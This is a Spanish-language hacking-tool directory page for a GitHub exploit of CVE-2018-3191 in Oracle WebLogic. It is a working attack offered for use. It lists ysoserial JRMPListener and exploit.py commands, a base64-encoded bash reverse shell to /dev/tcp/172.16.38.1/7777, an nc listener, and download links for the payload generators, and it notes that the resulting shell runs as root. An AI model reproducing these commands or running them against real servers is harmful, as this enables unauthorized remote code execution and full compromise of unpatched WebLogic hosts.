Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/libraggbond/cve-2018-3191
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHublibraggbond/cve-2018-3191

CVE-2018-3191

CVE-2018-3191 shell inversa

Ver Repositorio
6329hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-3191

CVE-2018-3191 reverse shell IP local: 172.16.38.1 Weblogic: 172.16.38.174:7001

  1. Ejecutar localmente java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'

Luego ejecutar nc -lvv 7777

(1) El comando bash se codificó en base64 para evitar que Runtime.getRuntime().exec() escape los caracteres especiales durante la ejecución. El texto plano es: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Esta operación inicia un JRMPListener localmente, que recibe la solicitud de Weblogic atacado y ejecuta el comando bash de reverse shell especificado. (3) Nc escucha en el puerto 7777 esperando la conexión reverse bash del host Weblogic. 2. Ejecutar python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, explotando la vulnerabilidad para que Weblogic acceda al servicio RMI remoto y ejecute el comando bash de reverse shell.

  1. El puerto escuchado por nc recibe el bash reverse, con privilegios de root.

Herramientas necesarias para el ataque: ysoserial-master.jar // herramienta de explotación de deserialización https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // generador de payload para CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // herramienta de envío del protocolo T3 de Weblogic, integra el payload de CVE-2018-3191

Descargar herramienta